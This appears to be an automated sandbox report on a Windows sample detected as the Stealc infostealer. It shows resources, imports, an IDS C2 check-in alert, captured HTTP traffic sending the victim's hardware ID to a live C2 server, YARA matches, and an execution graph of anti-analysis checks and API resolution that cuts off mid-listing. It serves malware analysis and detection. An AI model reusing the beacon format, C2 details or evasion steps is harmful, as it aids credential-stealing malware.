                                    RT_ICON0x751100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6596820809248555
                                    RT_ICON0x756780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.487551867219917
                                    RT_ICON0x756780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.487551867219917
                                    RT_ICON0x77c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.5060975609756098
                                    RT_ICON0x77c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.5060975609756098
                                    RT_ICON0x78cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.4860655737704918
                                    RT_ICON0x78cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.4860655737704918
                                    RT_ICON0x796500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5390070921985816
                                    RT_ICON0x796500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5390070921985816
                                    RT_DIALOG0x7dc300x58data0.8977272727272727
                                    RT_STRING0x7dc880x2c6dataTamilIndia0.4830985915492958
                                    RT_STRING0x7dc880x2c6dataTamilSri Lanka0.4830985915492958
                                    RT_STRING0x7df500x6b4dataTamilIndia0.42657342657342656
                                    RT_STRING0x7df500x6b4dataTamilSri Lanka0.42657342657342656
                                    RT_STRING0x7e6080x242dataTamilIndia0.4982698961937716
                                    RT_STRING0x7e6080x242dataTamilSri Lanka0.4982698961937716
                                    RT_STRING0x7e8500x620dataTamilIndia0.4343112244897959
                                    RT_STRING0x7e8500x620dataTamilSri Lanka0.4343112244897959
                                    RT_STRING0x7ee700x292dataTamilIndia0.4817629179331307
                                    RT_STRING0x7ee700x292dataTamilSri Lanka0.4817629179331307
                                    RT_ACCELERATOR0x79b300x48dataTamilIndia0.8472222222222222
                                    RT_ACCELERATOR0x79b300x48dataTamilSri Lanka0.8472222222222222
                                    RT_GROUP_CURSOR0x79fd80x22data1.0294117647058822
                                    RT_GROUP_CURSOR0x7bcb80x30data0.9375
                                    RT_GROUP_CURSOR0x7d9a00x30data0.9375
                                    RT_GROUP_ICON0x6ca580x68dataTamilIndia0.7019230769230769
                                    RT_GROUP_ICON0x6ca580x68dataTamilSri Lanka0.7019230769230769
                                    RT_GROUP_ICON0x668f80x68dataTamilIndia0.6826923076923077
                                    RT_GROUP_ICON0x668f80x68dataTamilSri Lanka0.6826923076923077
                                    RT_GROUP_ICON0x732800x76dataTamilIndia0.6779661016949152
                                    RT_GROUP_ICON0x732800x76dataTamilSri Lanka0.6779661016949152
                                    RT_GROUP_ICON0x79ab80x76dataTamilIndia0.6779661016949152
                                    RT_GROUP_ICON0x79ab80x76dataTamilSri Lanka0.6779661016949152
                                    RT_VERSION0x7d9d00x25cdata0.5413907284768212
                                    DLLImport
                                    KERNEL32.dllInterlockedDecrement, SetEnvironmentVariableW, QueryDosDeviceA, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, SetFileTime, ClearCommBreak, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesA, CreateProcessA, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, GetShortPathNameA, CreateJobObjectA, EnumCalendarInfoW, InterlockedExchange, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetProcAddress, EnumSystemCodePagesW, SetComputerNameA, SetFileAttributesA, GlobalFree, LoadLibraryA, LocalAlloc, CreateHardLinkW, GetNumberFormatW, CreateEventW, OpenEventA, FoldStringW, GlobalWire, EnumDateFormatsW, GetShortPathNameW, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, LCMapStringW, EnumCalendarInfoA, InterlockedIncrement, CommConfigDialogA, GetConsoleAliasExesA, GetLocaleInfoA, SetFilePointer, VerifyVersionInfoW, WriteConsoleW, CloseHandle, FlushFileBuffers, GetConsoleMode, GetConsoleCP, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, SetStdHandle, CreateFileW
                                    GDI32.dllGetCharWidthI, CreateDCA, CreateDCW, GetCharWidth32A
                                    ADVAPI32.dllReadEventLogW
                                    ole32.dllCoSuspendClassObjects
                                    WINHTTP.dllWinHttpOpen, WinHttpCheckPlatform
                                    Language of compilation systemCountry where language is spokenMap
                                    TamilIndia
                                    TamilSri Lanka
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-08T02:33:57.329692+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970462.122.184.14480TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 8, 2024 02:33:56.259769917 CEST4970480192.168.2.562.122.184.144
                                    Oct 8, 2024 02:33:56.264929056 CEST804970462.122.184.144192.168.2.5
                                    Oct 8, 2024 02:33:56.265006065 CEST4970480192.168.2.562.122.184.144
                                    Oct 8, 2024 02:33:56.265378952 CEST4970480192.168.2.562.122.184.144
                                    Oct 8, 2024 02:33:56.270183086 CEST804970462.122.184.144192.168.2.5
                                    Oct 8, 2024 02:33:57.003660917 CEST804970462.122.184.144192.168.2.5
                                    Oct 8, 2024 02:33:57.003720045 CEST4970480192.168.2.562.122.184.144
                                    Oct 8, 2024 02:33:57.007471085 CEST4970480192.168.2.562.122.184.144
                                    Oct 8, 2024 02:33:57.012455940 CEST804970462.122.184.144192.168.2.5
                                    Oct 8, 2024 02:33:57.329607010 CEST804970462.122.184.144192.168.2.5
                                    Oct 8, 2024 02:33:57.329691887 CEST4970480192.168.2.562.122.184.144
                                    Oct 8, 2024 02:34:02.334475994 CEST804970462.122.184.144192.168.2.5
                                    Oct 8, 2024 02:34:02.335477114 CEST4970480192.168.2.562.122.184.144
                                    Oct 8, 2024 02:34:18.854815960 CEST4970480192.168.2.562.122.184.144
                                    • 62.122.184.144
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.54970462.122.184.144804228C:\Users\user\Desktop\QmMKz5d4j7.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 8, 2024 02:33:56.265378952 CEST89OUTGET / HTTP/1.1
                                    Host: 62.122.184.144
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Oct 8, 2024 02:33:57.003660917 CEST203INHTTP/1.1 200 OK
                                    Date: Tue, 08 Oct 2024 00:33:56 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Oct 8, 2024 02:33:57.007471085 CEST419OUTPOST /f88d87a7e087e100.php HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGC
                                    Host: 62.122.184.144
                                    Content-Length: 218
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 31 37 32 46 32 44 33 38 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 2d 2d 0d 0a
                                    Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="hwid"16172F2D389E487256326------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="build"default5_pal------BFHJECAAAFHIJKFIJEGC--
                                    Oct 8, 2024 02:33:57.329607010 CEST210INHTTP/1.1 200 OK
                                    Date: Tue, 08 Oct 2024 00:33:57 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 8
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                    Data Ascii: YmxvY2s=


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:20:33:54
                                    Start date:07/10/2024
                                    Path:C:\Users\user\Desktop\QmMKz5d4j7.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\QmMKz5d4j7.exe"
                                    Imagebase:0x400000
                                    File size:453'632 bytes
                                    MD5 hash:14F08BD33D03C8C7FCC198CB30DC29F6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2247145227.0000000000691000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2247177078.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2031101975.0000000002350000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:4
                                    Start time:20:33:57
                                    Start date:07/10/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 1128
                                    Imagebase:0x460000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:7%
                                      Dynamic/Decrypted Code Coverage:6.7%
                                      Signature Coverage:12.7%
                                      Total number of Nodes:1424
                                      Total number of Limit Nodes:27
                                      execution_graph 27768 409440 strlen malloc strcpy_s free std::exception::exception 27806 22d932a ??2@YAPAXI RaiseException allocator 27826 41ce48 LeaveCriticalSection __initptd 27868 22e1525 strtok_s strtok_s lstrlen lstrcpy ctype 27770 41b050 6 API calls 3 library calls 27809 22d9b37 9 API calls 27830 22e1c35 110 API calls 27753 692e77 27754 692e86 27753->27754 27757 693617 27754->27757 27758 693632 27757->27758 27759 69363b CreateToolhelp32Snapshot 27758->27759 27760 693657 Module32First 27758->27760 27759->27758 27759->27760 27761 692e8f 27760->27761 27762 693666 27760->27762 27764 6932d6 27762->27764 27765 693301 27764->27765 27766 69334a 27765->27766 27767 693312 VirtualAlloc 27765->27767 27766->27766 27767->27766 27870 406f60 memcpy 27772 41dc60 atexit 27773 22e6a0a ExitProcess 27872 410765 279 API calls 27831 417667 lstrcpy 27728 22d0005 27733 22d092b GetPEB 27728->27733 27730 22d0030 27734 22d003c 27730->27734 27733->27730 27735 22d0049 27734->27735 27747 22d0e0f SetErrorMode SetErrorMode 27735->27747 27740 22d0265 27741 22d02ce VirtualProtect 27740->27741 27743 22d030b 27741->27743 27742 22d0439 VirtualFree 27744 22d04be LoadLibraryA 27742->27744 27743->27742 27746 22d08c7 27744->27746 27748 22d0223 27747->27748 27749 22d0d90 27748->27749 27750 22d0dad 27749->27750 27751 22d0dbb GetPEB 27750->27751 27752 22d0238 VirtualAlloc 27750->27752 27751->27752 27752->27740 27874 22ed106 41 API calls __amsg_exit 27832 41b270 5 API calls 2 library calls 27777 22e15b3 18 API calls ctype 27876 22df567 56 API calls 27877 22dfd67 152 API calls 27778 41bc11 71 API calls 2 library calls 27779 22ebe78 162 API calls 2 library calls 27780 22ecd97 170 API calls setSBUpLow 27781 22e3b7d 91 API calls 2 library calls 27782 41ac2c 71 API calls ctype 27783 22e6a40 6 API calls 27880 22e6d18 643 API calls 27838 22e102b strtok_s lstrlen lstrcpy 27839 22e6c57 689 API calls 27840 22e140b strtok_s 27784 22e32ae 22 API calls 27842 22ed0af RtlLeaveCriticalSection _raise 27785 4090c3 5 API calls allocator 27843 22e140b StrCmpCA strtok_s 27882 22ecd90 173 API calls 2 library calls 27787 22d6ebc VirtualProtect 27883 41abd0 free std::exception::_Tidy ctype 27845 22e0cb6 30 API calls 27846 22e04b7 88 API calls 27885 413916 91 API calls 2 library calls 27886 4183dc 15 API calls 27847 22e102b StrCmpCA strtok_s lstrlen lstrcpy 27887 22ecd8f 6 API calls 2 library calls 27888 22e118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27791 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27849 41ceea SetUnhandledExceptionFilter 27850 22e3823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 26309 4169f0 26352 402260 26309->26352 26326 417850 3 API calls 26327 416a30 26326->26327 26328 4178e0 3 API calls 26327->26328 26329 416a43 26328->26329 26485 41a9b0 26329->26485 26331 416a64 26332 41a9b0 4 API calls 26331->26332 26333 416a6b 26332->26333 26334 41a9b0 4 API calls 26333->26334 26335 416a72 26334->26335 26336 41a9b0 4 API calls 26335->26336 26337 416a79 26336->26337 26338 41a9b0 4 API calls 26337->26338 26339 416a80 26338->26339 26493 41a8a0 26339->26493 26341 416a89 26342 416b0c 26341->26342 26345 416ac2 OpenEventA 26341->26345 26497 416920 GetSystemTime 26342->26497 26347 416af5 CloseHandle Sleep 26345->26347 26348 416ad9 26345->26348 26349 416b0a 26347->26349 26351 416ae1 CreateEventA 26348->26351 26349->26341 26350 416b16 CloseHandle ExitProcess 26351->26342 26694 4045c0 17 API calls 26352->26694 26354 402274 26355 4045c0 34 API calls 26354->26355 26356 40228d 26355->26356 26357 4045c0 34 API calls 26356->26357 26358 4022a6 26357->26358 26359 4045c0 34 API calls 26358->26359 26360 4022bf 26359->26360 26361 4045c0 34 API calls 26360->26361 26362 4022d8 26361->26362 26363 4045c0 34 API calls 26362->26363 26364 4022f1 26363->26364 26365 4045c0 34 API calls 26364->26365 26366 40230a 26365->26366 26367 4045c0 34 API calls 26366->26367 26368 402323 26367->26368 26369 4045c0 34 API calls 26368->26369 26370 40233c 26369->26370 26371 4045c0 34 API calls 26370->26371 26372 402355 26371->26372 26373 4045c0 34 API calls 26372->26373 26374 40236e 26373->26374 26375 4045c0 34 API calls 26374->26375 26376 402387 26375->26376 26377 4045c0 34 API calls 26376->26377 26378 4023a0 26377->26378 26379 4045c0 34 API calls 26378->26379 26380 4023b9 26379->26380 26381 4045c0 34 API calls 26380->26381 26382 4023d2 26381->26382 26383 4045c0 34 API calls 26382->26383 26384 4023eb 26383->26384 26385 4045c0 34 API calls 26384->26385 26386 402404 26385->26386 26387 4045c0 34 API calls 26386->26387 26388 40241d 26387->26388 26389 4045c0 34 API calls 26388->26389 26390 402436 26389->26390 26391 4045c0 34 API calls 26390->26391 26392 40244f 26391->26392 26393 4045c0 34 API calls 26392->26393 26394 402468 26393->26394 26395 4045c0 34 API calls 26394->26395 26396 402481 26395->26396 26397 4045c0 34 API calls 26396->26397 26398 40249a 26397->26398 26399 4045c0 34 API calls 26398->26399 26400 4024b3 26399->26400 26401 4045c0 34 API calls 26400->26401 26402 4024cc 26401->26402 26403 4045c0 34 API calls 26402->26403 26404 4024e5 26403->26404 26405 4045c0 34 API calls 26404->26405 26406 4024fe 26405->26406 26407 4045c0 34 API calls 26406->26407 26408 402517 26407->26408 26409 4045c0 34 API calls 26408->26409 26410 402530 26409->26410 26411 4045c0 34 API calls 26410->26411 26412 402549 26411->26412 26413 4045c0 34 API calls 26412->26413 26414 402562 26413->26414 26415 4045c0 34 API calls 26414->26415 26416 40257b 26415->26416 26417 4045c0 34 API calls 26416->26417 26418 402594 26417->26418 26419 4045c0 34 API calls 26418->26419 26420 4025ad 26419->26420 26421 4045c0 34 API calls 26420->26421 26422 4025c6 26421->26422 26423 4045c0 34 API calls 26422->26423 26424 4025df 26423->26424 26425 4045c0 34 API calls 26424->26425 26426 4025f8 26425->26426 26427 4045c0 34 API calls 26426->26427 26428 402611 26427->26428 26429 4045c0 34 API calls 26428->26429 26430 40262a 26429->26430 26431 4045c0 34 API calls 26430->26431 26432 402643 26431->26432 26433 4045c0 34 API calls 26432->26433 26434 40265c 26433->26434 26435 4045c0 34 API calls 26434->26435 26436 402675 26435->26436 26437 4045c0 34 API calls 26436->26437 26438 40268e 26437->26438 26439 419860 26438->26439 26698 419750 GetPEB 26439->26698 26441 419868 26442 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26441->26442 26443 41987a 26441->26443 26444 419af4 GetProcAddress 26442->26444 26445 419b0d 26442->26445 26448 41988c 21 API calls 26443->26448 26444->26445 26446 419b46 26445->26446 26447 419b16 GetProcAddress GetProcAddress 26445->26447 26449 419b68 26446->26449 26450 419b4f GetProcAddress 26446->26450 26447->26446 26448->26442 26451 419b71 GetProcAddress 26449->26451 26452 419b89 26449->26452 26450->26449 26451->26452 26453 416a00 26452->26453 26454 419b92 GetProcAddress GetProcAddress 26452->26454 26455 41a740 26453->26455 26454->26453 26456 41a750 26455->26456 26457 416a0d 26456->26457 26458 41a77e lstrcpy 26456->26458 26459 4011d0 26457->26459 26458->26457 26460 4011e8 26459->26460 26461 401217 26460->26461 26462 40120f ExitProcess 26460->26462 26463 401160 GetSystemInfo 26461->26463 26464 401184 26463->26464 26465 40117c ExitProcess 26463->26465 26466 401110 GetCurrentProcess VirtualAllocExNuma 26464->26466 26467 401141 ExitProcess 26466->26467 26468 401149 26466->26468 26699 4010a0 VirtualAlloc 26468->26699 26471 401220 26703 4189b0 26471->26703 26474 401249 __aulldiv 26475 40129a 26474->26475 26476 401292 ExitProcess 26474->26476 26477 416770 GetUserDefaultLangID 26475->26477 26478 4167d3 GetUserDefaultLCID 26477->26478 26479 416792 26477->26479 26478->26326 26479->26478 26480 4167c1 ExitProcess 26479->26480 26481 4167a3 ExitProcess 26479->26481 26482 4167b7 ExitProcess 26479->26482 26483 4167cb ExitProcess 26479->26483 26484 4167ad ExitProcess 26479->26484 26705 41a710 26485->26705 26487 41a9c1 lstrlenA 26488 41a9e0 26487->26488 26489 41aa18 26488->26489 26491 41a9fa lstrcpy lstrcatA 26488->26491 26706 41a7a0 26489->26706 26491->26489 26492 41aa24 26492->26331 26494 41a8bb 26493->26494 26495 41a90b 26494->26495 26496 41a8f9 lstrcpy 26494->26496 26495->26341 26496->26495 26710 416820 26497->26710 26499 41698e 26500 416998 sscanf 26499->26500 26739 41a800 26500->26739 26502 4169aa SystemTimeToFileTime SystemTimeToFileTime 26503 4169e0 26502->26503 26504 4169ce 26502->26504 26506 415b10 26503->26506 26504->26503 26505 4169d8 ExitProcess 26504->26505 26507 415b1d 26506->26507 26508 41a740 lstrcpy 26507->26508 26509 415b2e 26508->26509 26741 41a820 lstrlenA 26509->26741 26512 41a820 2 API calls 26513 415b64 26512->26513 26514 41a820 2 API calls 26513->26514 26515 415b74 26514->26515 26745 416430 26515->26745 26518 41a820 2 API calls 26519 415b93 26518->26519 26520 41a820 2 API calls 26519->26520 26521 415ba0 26520->26521 26522 41a820 2 API calls 26521->26522 26523 415bad 26522->26523 26524 41a820 2 API calls 26523->26524 26525 415bf9 26524->26525 26754 4026a0 26525->26754 26533 415cc3 26534 416430 lstrcpy 26533->26534 26535 415cd5 26534->26535 26536 41a7a0 lstrcpy 26535->26536 26537 415cf2 26536->26537 26538 41a9b0 4 API calls 26537->26538 26539 415d0a 26538->26539 26540 41a8a0 lstrcpy 26539->26540 26541 415d16 26540->26541 26542 41a9b0 4 API calls 26541->26542 26543 415d3a 26542->26543 26544 41a8a0 lstrcpy 26543->26544 26545 415d46 26544->26545 26546 41a9b0 4 API calls 26545->26546 26547 415d6a 26546->26547 26548 41a8a0 lstrcpy 26547->26548 26549 415d76 26548->26549 26550 41a740 lstrcpy 26549->26550 26551 415d9e 26550->26551 27478 417500 GetWindowsDirectoryA 26551->27478 26554 41a7a0 lstrcpy 26555 415db8 26554->26555 27488 404880 26555->27488 26557 415dbe 27633 4117a0 26557->27633 26559 415dc6 26560 41a740 lstrcpy 26559->26560 26561 415de9 26560->26561 26562 401590 lstrcpy 26561->26562 26563 415dfd 26562->26563 27653 405960 39 API calls ctype 26563->27653 26565 415e03 27654 411050 strtok_s strtok_s lstrlenA lstrcpy 26565->27654 26567 415e0e 26568 41a740 lstrcpy 26567->26568 26569 415e32 26568->26569 26570 401590 lstrcpy 26569->26570 26571 415e46 26570->26571 27655 405960 39 API calls ctype 26571->27655 26573 415e4c 27656 410d90 7 API calls 26573->27656 26575 415e57 26576 41a740 lstrcpy 26575->26576 26577 415e79 26576->26577 26578 401590 lstrcpy 26577->26578 26579 415e8d 26578->26579 27657 405960 39 API calls ctype 26579->27657 26581 415e93 27658 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26581->27658 26583 415e9e 26584 401590 lstrcpy 26583->26584 26585 415eb5 26584->26585 27659 411a10 121 API calls 26585->27659 26587 415eba 26588 41a740 lstrcpy 26587->26588 26589 415ed6 26588->26589 27660 404fb0 8 API calls 26589->27660 26591 415edb 26592 401590 lstrcpy 26591->26592 26593 415f5b 26592->26593 27661 410740 292 API calls 26593->27661 26595 415f60 26596 41a740 lstrcpy 26595->26596 26597 415f86 26596->26597 26598 401590 lstrcpy 26597->26598 26599 415f9a 26598->26599 27662 405960 39 API calls ctype 26599->27662 26601 415fa0 27663 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26601->27663 26603 415fab 26604 401590 lstrcpy 26603->26604 26605 415feb 26604->26605 27664 401e80 67 API calls 26605->27664 26607 415ff0 26608 416000 26607->26608 26609 416092 26607->26609 26611 41a740 lstrcpy 26608->26611 26610 41a7a0 lstrcpy 26609->26610 26612 4160a5 26610->26612 26613 416020 26611->26613 26614 401590 lstrcpy 26612->26614 26615 401590 lstrcpy 26613->26615 26616 4160b9 26614->26616 26617 416034 26615->26617 27668 405960 39 API calls ctype 26616->27668 27665 405960 39 API calls ctype 26617->27665 26620 4160bf 27669 413560 36 API calls 26620->27669 26621 41603a 27666 4112d0 21 API calls ctype 26621->27666 26624 41608a 26629 401590 lstrcpy 26624->26629 26656 41610b 26624->26656 26625 416045 26626 401590 lstrcpy 26625->26626 26627 416085 26626->26627 27667 413dc0 75 API calls 26627->27667 26628 416130 26632 416155 26628->26632 26635 401590 lstrcpy 26628->26635 26633 4160e7 26629->26633 26631 401590 lstrcpy 26634 41612b 26631->26634 26637 401590 lstrcpy 26632->26637 26651 41617a 26632->26651 27670 4140b0 64 API calls ctype 26633->27670 27672 414780 116 API calls ctype 26634->27672 26639 416150 26635->26639 26641 416175 26637->26641 27673 414bb0 67 API calls ctype 26639->27673 26640 4160ec 26644 401590 lstrcpy 26640->26644 27674 414d70 75 API calls 26641->27674 26642 401590 lstrcpy 26646 41619a 26642->26646 26648 416106 26644->26648 27675 414f40 69 API calls ctype 26646->27675 26647 401590 lstrcpy 26655 4161bf 26647->26655 27671 415100 71 API calls 26648->27671 26650 401590 lstrcpy 26657 4161e4 26650->26657 26651->26642 26659 41619f 26651->26659 26652 4161e9 26653 416210 26652->26653 26658 401590 lstrcpy 26652->26658 26660 416220 26653->26660 26661 4162b3 26653->26661 27676 407710 125 API calls ctype 26655->27676 26656->26628 26656->26631 27677 415050 67 API calls ctype 26657->27677 26664 416209 26658->26664 26659->26647 26667 4161c4 26659->26667 26666 41a740 lstrcpy 26660->26666 26665 41a7a0 lstrcpy 26661->26665 27678 419010 54 API calls ctype 26664->27678 26669 4162c6 26665->26669 26670 416241 26666->26670 26667->26650 26667->26652 26672 401590 lstrcpy 26669->26672 26671 401590 lstrcpy 26670->26671 26673 416255 26671->26673 26674 4162da 26672->26674 27679 405960 39 API calls ctype 26673->27679 27682 405960 39 API calls ctype 26674->27682 26677 4162e0 27683 413560 36 API calls 26677->27683 26678 41625b 27680 4112d0 21 API calls ctype 26678->27680 26681 4162ab 26684 41a7a0 lstrcpy 26681->26684 26682 416266 26683 401590 lstrcpy 26682->26683 26685 4162a6 26683->26685 26686 4162fc 26684->26686 27681 413dc0 75 API calls 26685->27681 26688 401590 lstrcpy 26686->26688 26689 416310 26688->26689 27684 405960 39 API calls ctype 26689->27684 26691 41631c 26693 416338 26691->26693 27685 416630 9 API calls ctype 26691->27685 26693->26350 26695 404697 26694->26695 26696 4046ac 11 API calls 26695->26696 26697 40474f 6 API calls 26695->26697 26696->26695 26697->26354 26698->26441 26701 4010c2 ctype 26699->26701 26700 4010fd 26700->26471 26701->26700 26702 4010e2 VirtualFree 26701->26702 26702->26700 26704 401233 GlobalMemoryStatusEx 26703->26704 26704->26474 26705->26487 26707 41a7c2 26706->26707 26708 41a7ec 26707->26708 26709 41a7da lstrcpy 26707->26709 26708->26492 26709->26708 26711 41a740 lstrcpy 26710->26711 26712 416833 26711->26712 26713 41a9b0 4 API calls 26712->26713 26714 416845 26713->26714 26715 41a8a0 lstrcpy 26714->26715 26716 41684e 26715->26716 26717 41a9b0 4 API calls 26716->26717 26718 416867 26717->26718 26719 41a8a0 lstrcpy 26718->26719 26720 416870 26719->26720 26721 41a9b0 4 API calls 26720->26721 26722 41688a 26721->26722 26723 41a8a0 lstrcpy 26722->26723 26724 416893 26723->26724 26725 41a9b0 4 API calls 26724->26725 26726 4168ac 26725->26726 26727 41a8a0 lstrcpy 26726->26727 26728 4168b5 26727->26728 26729 41a9b0 4 API calls 26728->26729 26730 4168cf 26729->26730 26731 41a8a0 lstrcpy 26730->26731 26732 4168d8 26731->26732 26733 41a9b0 4 API calls 26732->26733 26734 4168f3 26733->26734 26735 41a8a0 lstrcpy 26734->26735 26736 4168fc 26735->26736 26737 41a7a0 lstrcpy 26736->26737 26738 416910 26737->26738 26738->26499 26740 41a812 26739->26740 26740->26502 26742 41a83f 26741->26742 26743 415b54 26742->26743 26744 41a87b lstrcpy 26742->26744 26743->26512 26744->26743 26746 41a8a0 lstrcpy 26745->26746 26747 416443 26746->26747 26748 41a8a0 lstrcpy 26747->26748 26749 416455 26748->26749 26750 41a8a0 lstrcpy 26749->26750 26751 416467 26750->26751 26752 41a8a0 lstrcpy 26751->26752 26753 415b86 26752->26753 26753->26518 26755 4045c0 34 API calls 26754->26755 26756 4026b4 26755->26756 26757 4045c0 34 API calls 26756->26757 26758 4026d7 26757->26758 26759 4045c0 34 API calls 26758->26759 26760 4026f0 26759->26760 26761 4045c0 34 API calls 26760->26761 26762 402709 26761->26762 26763 4045c0 34 API calls 26762->26763 26764 402736 26763->26764 26765 4045c0 34 API calls 26764->26765 26766 40274f 26765->26766 26767 4045c0 34 API calls 26766->26767 26768 402768 26767->26768 26769 4045c0 34 API calls 26768->26769 26770 402795 26769->26770 26771 4045c0 34 API calls 26770->26771 26772 4027ae 26771->26772 26773 4045c0 34 API calls 26772->26773 26774 4027c7 26773->26774 26775 4045c0 34 API calls 26774->26775 26776 4027e0 26775->26776 26777 4045c0 34 API calls 26776->26777 26778 4027f9 26777->26778 26779 4045c0 34 API calls 26778->26779 26780 402812 26779->26780 26781 4045c0 34 API calls 26780->26781 26782 40282b 26781->26782 26783 4045c0 34 API calls 26782->26783 26784 402844 26783->26784 26785 4045c0 34 API calls 26784->26785 26786 40285d 26785->26786 26787 4045c0 34 API calls 26786->26787 26788 402876 26787->26788 26789 4045c0 34 API calls 26788->26789 26790 40288f 26789->26790 26791 4045c0 34 API calls 26790->26791 26792 4028a8 26791->26792 26793 4045c0 34 API calls 26792->26793 26794 4028c1 26793->26794 26795 4045c0 34 API calls 26794->26795 26796 4028da 26795->26796 26797 4045c0 34 API calls 26796->26797 26798 4028f3 26797->26798 26799 4045c0 34 API calls 26798->26799 26800 